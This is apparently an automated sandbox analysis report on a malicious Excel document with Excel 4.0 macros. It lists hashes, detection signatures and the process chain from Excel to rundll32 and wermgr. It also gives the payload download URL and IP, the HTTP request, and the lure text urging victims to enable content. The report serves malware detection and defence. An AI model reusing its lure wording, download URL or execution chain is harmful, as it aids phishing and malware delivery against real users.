Loading ...

Play interactive tourEdit tour

Analysis Report SecuriteInfo.com.Trojan.Agent.FFFK.23764.7918

Overview

General Information

Sample Name:SecuriteInfo.com.Trojan.Agent.FFFK.23764.7918 (renamed file extension from 7918 to xls)
Analysis ID:383012
MD5:73690262256f3a4872aaadb37acac4ed
SHA1:cd4327807142a8815c3a13a46ddb7abd8f23b32f
SHA256:2cf291ca376a58d5ed057798b78331d28e1b16efcf193181ed0f85ecb05dac76
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Document exploit detected (drops PE files)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Office process drops PE file
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Document contains embedded VBA macros
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2332 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • rundll32.exe (PID: 2500 cmdline: rundll32 ..\sdbybsd.fds,StartW MD5: DD81D91FF3B0763C392422865C9AC12E)
      • rundll32.exe (PID: 2540 cmdline: rundll32 ..\sdbybsd.fds,StartW MD5: 51138BEEA3E2C21EC44D0932C71762A8)
        • wermgr.exe (PID: 2396 cmdline: C:\Windows\system32\wermgr.exe MD5: 41DF7355A5A907E2C1D7804EC028965D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
SecuriteInfo.com.Trojan.Agent.FFFK.23764.xlsSUSP_EnableContent_String_GenDetects suspicious string that asks to enable active content in Office DocFlorian Roth
  • 0x12ebb:$e1: Enable Editing
  • 0x12c05:$e3: Enable editing
  • 0x12cd7:$e4: Enable content

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Antivirus detection for URL or domainShow sources
Source: http://revolet-sa.com/files/countryyelow.phpAvira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URLShow sources
Source: http://revolet-sa.com/files/countryyelow.phpVirustotal: Detection: 12%Perma Link
Multi AV Scanner detection for dropped fileShow sources
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\0KQe7[1].fbxVirustotal: Detection: 21%Perma Link
Source: C:\Users\user\sdbybsd.fdsVirustotal: Detection: 21%Perma Link
Multi AV Scanner detection for submitted fileShow sources
Source: SecuriteInfo.com.Trojan.Agent.FFFK.23764.xlsVirustotal: Detection: 14%Perma Link
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: Binary string: K:\PrintMyMschartLegends_src\Source Code\PrintMyMschartLegends\Release\PrintMyMschartLegends.pdb source: sdbybsd.fds.0.dr

Software Vulnerabilities:

barindex
Document exploit detected (drops PE files)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: 0KQe7[1].fbx.0.drJump to dropped file
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe
Source: global trafficDNS query: name: revolet-sa.com
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.232.249.186:80
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.232.249.186:80
Source: global trafficHTTP traffic detected: GET /files/countryyelow.php HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: revolet-sa.comConnection: Keep-Alive
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\99467C6B.emfJump to behavior
Source: global trafficHTTP traffic detected: GET /files/countryyelow.php HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: revolet-sa.comConnection: Keep-Alive
Source: rundll32.exe, 00000003.00000002.2080456490.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2078621601.0000000001D00000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknownDNS traffic detected: queries for: revolet-sa.com
Source: rundll32.exe, 00000003.00000002.2080456490.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2078621601.0000000001D00000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000003.00000002.2080456490.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2078621601.0000000001D00000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000003.00000002.2080761458.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2078800235.0000000001EE7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000003.00000002.2080761458.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2078800235.0000000001EE7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: rundll32.exe, 00000004.00000002.2079476643.00000000028C0000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: rundll32.exe, 00000003.00000002.2080761458.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2078800235.0000000001EE7000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: rundll32.exe, 00000003.00000002.2080761458.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2078800235.0000000001EE7000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: rundll32.exe, 00000004.00000002.2079476643.00000000028C0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
Source: rundll32.exe, 00000003.00000002.2080456490.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2078621601.0000000001D00000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000003.00000002.2080761458.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2078800235.0000000001EE7000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000003.00000002.2080456490.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2078621601.0000000001D00000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000004.00000002.2078621601.0000000001D00000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 4Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. :54 Protected View Thi
Source: Screenshot number: 4Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start 18 the decryption of the docum
Source: Document image extraction number: 2Screenshot OCR: Enable editing" to unlock the editing document downloaded from the internet. Protected View This fi
Source: Document image extraction number: 2Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start the decryption of the document
Source: Document image extraction number: 3Screenshot OCR: Enable Content
Source: Document image extraction number: 4Screenshot OCR: Enable Editing
Source: Document image extraction number: 14Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. Protected View This fi
Source: Document image extraction number: 14Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start the decryption of the document
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: SecuriteInfo.com.Trojan.Agent.FFFK.23764.xlsInitial sample: EXEC
Source: SecuriteInfo.com.Trojan.Agent.FFFK.23764.xlsInitial sample: CALL
Office process drops PE fileShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\0KQe7[1].fbxJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\sdbybsd.fdsJump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
Source: SecuriteInfo.com.Trojan.Agent.FFFK.23764.xlsOLE indicator, VBA macros: true
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\0KQe7[1].fbx AC17E1F54B9F800D874E1D012E541FC037BD1A31EE3E8F631A454F2D1DE6ADA1
Source: Joe Sandbox ViewDropped File: C:\Users\user\sdbybsd.fds AC17E1F54B9F800D874E1D012E541FC037BD1A31EE3E8F631A454F2D1DE6ADA1
Source: SecuriteInfo.com.Trojan.Agent.FFFK.23764.xls, type: SAMPLEMatched rule: SUSP_EnableContent_String_Gen date = 2019-02-12, hash1 = 525ba2c8d35f6972ac8fcec8081ae35f6fe8119500be20a4113900fe57d6a0de, author = Florian Roth, description = Detects suspicious string that asks to enable active content in Office Doc, reference = Internal Research
Source: rundll32.exe, 00000003.00000002.2080456490.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2078621601.0000000001D00000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
Source: classification engineClassification label: mal100.expl.evad.winXLS@7/8@1/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\GDIPFONTCACHEV1.DATJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRB0D7.tmpJump to behavior
Source: SecuriteInfo.com.Trojan.Agent.FFFK.23764.xlsOLE indicator, Workbook stream: true
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\sdbybsd.fds,StartW
Source: SecuriteInfo.com.Trojan.Agent.FFFK.23764.xlsVirustotal: Detection: 14%
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\sdbybsd.fds,StartW
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\sdbybsd.fds,StartW
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\sdbybsd.fds,StartWJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\sdbybsd.fds,StartWJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exeJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: Binary string: K:\PrintMyMschartLegends_src\Source Code\PrintMyMschartLegends\Release\PrintMyMschartLegends.pdb source: sdbybsd.fds.0.dr
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_003A1030 LoadLibraryW,GetProcAddress,SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,SetLastError,GetProcessHeap,RtlAllocateHeap,SetLastError,4_2_003A1030
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00710E20 push dword ptr [edx+14h]; ret 4_2_00710F2D
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\0KQe7[1].fbxJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\sdbybsd.fdsJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\sdbybsd.fdsJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\0KQe7[1].fbxJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\sdbybsd.fdsJump to dropped file

Boot Survival:

barindex
Drops PE files to the user root directoryShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\sdbybsd.fdsJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\0KQe7[1].fbxJump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_003A1030 LoadLibraryW,GetProcAddress,SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,SetLastError,GetProcessHeap,RtlAllocateHeap,SetLastError,4_2_003A1030
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00260456 mov eax, dword ptr fs:[00000030h]4_2_00260456
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0026095E mov eax, dword ptr fs:[00000030h]4_2_0026095E
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_003A1030 mov eax, dword ptr fs:[00000030h]4_2_003A1030
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_003A1030 LoadLibraryW,GetProcAddress,SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,SetLastError,GetProcessHeap,RtlAllocateHeap,SetLastError,4_2_003A1030
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\sdbybsd.fds,StartWJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting11Path InterceptionProcess Injection11Masquerading121OS Credential DumpingSecurity Software Discovery11Remote ServicesData from Local SystemExfiltration Over Other Network MediumIngress Tool Transfer2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsNative API1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsExploitation for Client Execution33Logon Script (Windows)Logon Script (Windows)Process Injection11Security Account ManagerSystem Information Discovery3SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol12Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting11NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information1LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonRundll321Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
SecuriteInfo.com.Trojan.Agent.FFFK.23764.xls15%VirustotalBrowse

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\0KQe7[1].fbx22%VirustotalBrowse
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\0KQe7[1].fbx5%MetadefenderBrowse
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\0KQe7[1].fbx2%ReversingLabsWin32.Trojan.Trickpak
C:\Users\user\sdbybsd.fds22%VirustotalBrowse
C:\Users\user\sdbybsd.fds5%MetadefenderBrowse
C:\Users\user\sdbybsd.fds2%ReversingLabsWin32.Trojan.Trickpak

Unpacked PE Files

SourceDetectionScannerLabelLinkDownload
4.2.rundll32.exe.410000.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File

Domains

SourceDetectionScannerLabelLink
revolet-sa.com4%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
http://www.%s.comPA0%URL Reputationsafe
http://www.%s.comPA0%URL Reputationsafe
http://www.%s.comPA0%URL Reputationsafe
http://www.%s.comPA0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://revolet-sa.com/files/countryyelow.php13%VirustotalBrowse
http://revolet-sa.com/files/countryyelow.php100%Avira URL Cloudmalware
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
revolet-sa.com
192.232.249.186
truefalseunknown

Contacted URLs

NameMaliciousAntivirus DetectionReputation
http://revolet-sa.com/files/countryyelow.phptrue
  • 13%, Virustotal, Browse
  • Avira URL Cloud: malware
unknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkrundll32.exe, 00000003.00000002.2080761458.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2078800235.0000000001EE7000.00000002.00000001.sdmpfalse
    high
    http://www.windows.com/pctv.rundll32.exe, 00000004.00000002.2078621601.0000000001D00000.00000002.00000001.sdmpfalse
      high
      http://investor.msn.comrundll32.exe, 00000003.00000002.2080456490.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2078621601.0000000001D00000.00000002.00000001.sdmpfalse
        high
        http://www.msnbc.com/news/ticker.txtrundll32.exe, 00000003.00000002.2080456490.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2078621601.0000000001D00000.00000002.00000001.sdmpfalse
          high
          http://www.%s.comPArundll32.exe, 00000004.00000002.2079476643.00000000028C0000.00000002.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          low
          http://www.icra.org/vocabulary/.rundll32.exe, 00000003.00000002.2080761458.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2078800235.0000000001EE7000.00000002.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          unknown
          http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.rundll32.exe, 00000004.00000002.2079476643.00000000028C0000.00000002.00000001.sdmpfalse
            high
            http://windowsmedia.com/redir/services.asp?WMPFriendly=truerundll32.exe, 00000003.00000002.2080761458.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2078800235.0000000001EE7000.00000002.00000001.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            unknown
            http://www.hotmail.com/oerundll32.exe, 00000003.00000002.2080456490.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2078621601.0000000001D00000.00000002.00000001.sdmpfalse
              high
              http://investor.msn.com/rundll32.exe, 00000003.00000002.2080456490.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2078621601.0000000001D00000.00000002.00000001.sdmpfalse
                high

                Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public

                IPDomainCountryFlagASNASN NameMalicious
                192.232.249.186
                revolet-sa.comUnited States
                46606UNIFIEDLAYER-AS-1USfalse

                General Information

                Joe Sandbox Version:31.0.0 Emerald
                Analysis ID:383012
                Start date:07.04.2021
                Start time:05:50:18
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 5m 14s
                Hypervisor based Inspection enabled:false
                Report type:full
                Sample file name:SecuriteInfo.com.Trojan.Agent.FFFK.23764.7918 (renamed file extension from 7918 to xls)
                Cookbook file name:defaultwindowsofficecookbook.jbs
                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                Number of analysed new started processes analysed:7
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal100.expl.evad.winXLS@7/8@1/1
                EGA Information:Failed
                HDC Information:
                • Successful, ratio: 8.1% (good quality ratio 5.4%)
                • Quality average: 64.3%
                • Quality standard deviation: 45.9%
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 9
                • Number of non-executed functions: 4
                Cookbook Comments:
                • Adjust boot time
                • Enable AMSI
                • Found Word or Excel or PowerPoint or XPS Viewer
                • Attach to Office via COM
                • Scroll down
                • Close Viewer
                Warnings:
                Show All
                • Exclude process from analysis (whitelisted): dllhost.exe
                • Report size getting too big, too many NtCreateFile calls found.
                • Report size getting too big, too many NtQueryAttributesFile calls found.

                Simulations

                Behavior and APIs

                TimeTypeDescription
                05:50:36API Interceptor8x Sleep call for process: rundll32.exe modified

                Joe Sandbox View / Context

                IPs

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                192.232.249.186SecuriteInfo.com.Heur.19090.xlsGet hashmaliciousBrowse
                • revolet-sa.com/files/countryyelow.php
                SecuriteInfo.com.Heur.4923.xlsGet hashmaliciousBrowse
                • revolet-sa.com/files/countryyelow.php
                SecuriteInfo.com.Heur.4923.xlsGet hashmaliciousBrowse
                • revolet-sa.com/files/countryyelow.php

                Domains

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                revolet-sa.comSecuriteInfo.com.Heur.19090.xlsGet hashmaliciousBrowse
                • 192.232.249.186
                SecuriteInfo.com.Heur.4923.xlsGet hashmaliciousBrowse
                • 192.232.249.186
                SecuriteInfo.com.Heur.4923.xlsGet hashmaliciousBrowse
                • 192.232.249.186

                ASN

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                UNIFIEDLAYER-AS-1USSecuriteInfo.com.Heur.19090.xlsGet hashmaliciousBrowse
                • 192.232.249.186
                SALM0BRU.exeGet hashmaliciousBrowse
